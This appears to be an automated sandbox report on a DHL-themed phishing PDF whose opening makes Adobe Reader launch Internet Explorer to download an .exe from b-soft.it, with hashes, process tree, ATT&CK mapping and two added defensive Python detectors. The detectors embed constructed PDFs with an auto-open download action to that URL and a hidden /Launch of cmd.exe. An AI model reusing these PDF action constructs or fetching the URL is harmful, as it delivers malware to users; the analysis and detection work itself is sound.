Resubmissions

16-11-2021 12:04

211116-n8q8cadfh8 4

16-11-2021 11:58

211116-n5f8zadfg9 3

16-11-2021 11:55

211116-n3qpmaaffn 4

Analysis

  • max time kernel
    145s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-en-20211014
  • submitted
    16-11-2021 11:55

General

  • Target

    ModuloConfermaIndirizzo_2016_56.pdf

  • Size

    89KB

  • MD5

    3e4e9232f4a973055eef13a2692ffc54

  • SHA1

    94cc703064b56a0416d884be1bf6a2edb66521c1

  • SHA256

    445f1576ff067209bd366064032e5826ef4b3b0e6b299184443053be75e49289

  • SHA512

    e6958ff09ca3ac3e826ce80d91c319d67390af75632a1012694799999ab9fd6b9a00e147b62fcd681fca76502a0fa2ff345af97e7754d3dea3c4c9611258dca6

Score
1/10

Malware Config

Signatures

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ModuloConfermaIndirizzo_2016_56.pdf"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:836
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" http://www.b-soft.it/FOTO/DHL/ModuloConfermaIndirizzo_2016.exe
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:804
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:804 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:432
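The tree above shows Adobe Reader handing Internet Explorer a URL whose path ends in .exe, so the document itself, not a browser exploit, is what starts the download of ModuloConfermaIndirizzo_2016.exe. The report does not show which PDF feature did it; a /URI action fired from the catalog's /OpenAction, a /Launch action, or embedded JavaScript are the usual candidates. The Python script below is an added example, not part of the report or of the sandbox's tooling: it scans a PDF for those three action types, inflating Flate-compressed streams first so actions tucked into object streams are not missed, and flags any target that would run code or deliver an executable. Both embedded PDFs are constructed for the example and are not the analysed file; the first uses a /URI OpenAction pointing at the URL from the report, which is an assumption about the mechanism, and the second hides a /Launch action in a compressed stream.

```python
import re
import zlib

# Extensions whose download or launch hands the user a program to run.
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".msi", ".bat", ".cmd", ".js", ".vbs", ".hta", ".ps1", ".dll")

# Constructed sample, not the analysed file: a minimal PDF whose /OpenAction is a
# /URI action pointing at the URL the sandbox saw on the iexplore.exe command
# line. That the real PDF used this mechanism is an assumption the report does not settle.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /S /URI /URI (http://www.b-soft.it/FOTO/DHL/ModuloConfermaIndirizzo_2016.exe) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# Second constructed sample: a /Launch action hidden in a Flate-compressed object
# stream, which a plain string search over the raw file would miss.
COMPRESSED_PDF = (
    b"%PDF-1.5\n5 0 obj\n<< /Type /ObjStm /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(b"6 0 << /S /Launch /F (cmd.exe) /P (/c calc) >>")
    + b"\nendstream\nendobj\n%%EOF\n"
)

_STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.DOTALL)
_PDF_STRING = rb"\(((?:\\.|[^()\\])*)\)"  # PDF literal string, with backslash escapes
_URI_RE = re.compile(rb"/S\s*/URI\b[^>]*?/URI\s*" + _PDF_STRING, re.DOTALL)
_LAUNCH_RE = re.compile(rb"/S\s*/Launch\b[^>]*?/F\s*" + _PDF_STRING, re.DOTALL)
_JS_RE = re.compile(rb"/S\s*/JavaScript\b")


def expand_streams(data: bytes) -> bytes:
    """Return the file plus the inflated body of every stream zlib can decode.

    Action dictionaries may sit inside compressed object streams; streams that
    are not Flate-encoded (images, fonts) fail to inflate and are skipped.
    """
    inflated = []
    for m in _STREAM_RE.finditer(data):
        try:
            inflated.append(zlib.decompress(m.group(1)))
        except zlib.error:
            continue
    return b"\n".join([data, *inflated])


def _unescape(s: bytes) -> str:
    """Undo the PDF literal-string escapes that matter for a URL or file path."""
    return (s.replace(b"\\(", b"(").replace(b"\\)", b")")
             .replace(b"\\\\", b"\\").decode("latin-1"))


def find_actions(data: bytes) -> list[dict]:
    """List URI, Launch and JavaScript actions found anywhere in the PDF."""
    data = expand_streams(data)
    actions = [{"type": "URI", "target": _unescape(m.group(1))} for m in _URI_RE.finditer(data)]
    actions += [{"type": "Launch", "target": _unescape(m.group(1))} for m in _LAUNCH_RE.finditer(data)]
    actions += [{"type": "JavaScript", "target": ""} for _ in _JS_RE.finditer(data)]
    return actions


def risky_targets(actions: list[dict]) -> list[str]:
    """Actions that run code directly or fetch a file the OS would execute."""
    risky = []
    for a in actions:
        if a["type"] in ("Launch", "JavaScript"):
            risky.append(f"{a['type']}: {a['target'] or '<inline script>'}")
            continue
        # Strip query string and fragment before looking at the extension.
        path = a["target"].split("?", 1)[0].split("#", 1)[0].lower()
        if path.endswith(EXECUTABLE_EXTENSIONS):
            risky.append(f"URI: {a['target']}")
    return risky


def has_open_action(data: bytes) -> bool:
    """True when the catalog fires an action on open, i.e. with no click required."""
    return b"/OpenAction" in expand_streams(data)


def triage(data: bytes) -> dict:
    actions = find_actions(data)
    return {"open_action": has_open_action(data), "actions": actions, "risky": risky_targets(actions)}


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_PDF
    for key, value in triage(blob).items():
        print(f"{key}: {value}")
```

Run it against the real sample with the file path as the only argument; a hit on /OpenAction together with a URI or Launch target explains the AcroRd32.exe to iexplore.exe chain without any exploit, while an empty result means the trigger is somewhere this regex pass does not reach (an encrypted document, JavaScript that builds the URL at runtime) and the file needs a full parser.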

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112
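The ATT&CK mapping above records only the registry changes Internet Explorer makes on start-up; the behaviour worth a detection rule is the chain in the process tree, a document reader spawning a browser with an executable URL on its command line. The Python below is an added example, not from the report or the sandbox, that applies such a rule to constructed process-creation records modelled on that tree. The images and command lines are the ones the report shows; the parent pid of AcroRd32.exe and the two explorer.exe records are invented so the rule has a benign browser launch to ignore.

```python
import re
from urllib.parse import urlparse

# Parents that should never need to start a browser on an executable URL.
DOCUMENT_READERS = {"acrord32.exe", "acrobat.exe", "foxitreader.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
BROWSERS = {"iexplore.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
EXECUTABLE_EXTENSIONS = (".exe", ".scr", ".msi", ".bat", ".cmd", ".js", ".vbs", ".hta", ".ps1")
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation events. Images and command lines follow the
# report's tree; pids 1200/1500 and the explorer.exe records are invented.
EVENTS = [
    {"pid": 1500, "ppid": 1200, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 836, "ppid": 1500, "image": r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe",
     "cmdline": r'"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ModuloConfermaIndirizzo_2016_56.pdf"'},
    {"pid": 804, "ppid": 836, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" http://www.b-soft.it/FOTO/DHL/ModuloConfermaIndirizzo_2016.exe'},
    {"pid": 432, "ppid": 804, "image": r"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE",
     "cmdline": r'"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:804 CREDAT:275457 /prefetch:2'},
    # Benign contrast: the user opens the browser from the shell on an ordinary page.
    {"pid": 1510, "ppid": 1500, "image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "cmdline": r'"C:\Program Files\Internet Explorer\iexplore.exe" http://www.example.com/index.html'},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def url_points_at_executable(url: str) -> bool:
    """Judge the URL path only, so query strings cannot hide the extension."""
    return urlparse(url).path.lower().endswith(EXECUTABLE_EXTENSIONS)


def descendants(events: list[dict], pid: int) -> list[int]:
    """All pids below `pid`, so the IE content process spawned by the hit is scoped in."""
    children: dict[int, list[int]] = {}
    for e in events:
        children.setdefault(e["ppid"], []).append(e["pid"])
    found, stack = [], [pid]
    while stack:
        for child in children.get(stack.pop(), []):
            found.append(child)
            stack.append(child)
    return sorted(found)


def detect(events: list[dict]) -> list[dict]:
    """Flag browsers started by a document reader; raise severity on an executable URL."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in DOCUMENT_READERS:
            continue
        if basename(e["image"]) not in BROWSERS:
            continue
        exe_urls = [u for u in URL_RE.findall(e["cmdline"]) if url_points_at_executable(u)]
        hits.append({
            "pid": e["pid"],
            "parent": basename(parent["image"]),
            "child": basename(e["image"]),
            "urls": exe_urls,
            "severity": "high" if exe_urls else "low",
            "related_pids": descendants(events, e["pid"]),
        })
    return hits


if __name__ == "__main__":
    for hit in detect(EVENTS):
        print(hit)
```

The two-tier severity matters in practice: a reader opening a browser on an ordinary link is common and stays at "low", while the .exe URL from this report is the case that should page someone, with the SCODEF child process included so the whole chain is collected in one alert.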

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\59D5FEL2.txt
    MD5

    675b382e051c79e8bacb93a82249f42c

    SHA1

    2dca7b031bbb656a07375582f61834b40b9500e5

    SHA256

    c27e3f2582f391d1f49fdecd1541bd613d9b9bb89eb10f3b30834806f4d5b76c

    SHA512

    d2ad91e543c527152fa004d663be5f4683cbb06fcd7333e98720e129a9436bd5a53ba4b0480b9e38b28f4cd3651cdc6660fbbb9bf05b64a30ee376cb3a7d9052

  • memory/432-57-0x0000000000000000-mapping.dmp
  • memory/804-56-0x0000000000000000-mapping.dmp
  • memory/836-55-0x0000000076531000-0x0000000076533000-memory.dmp
    Filesize

    8KB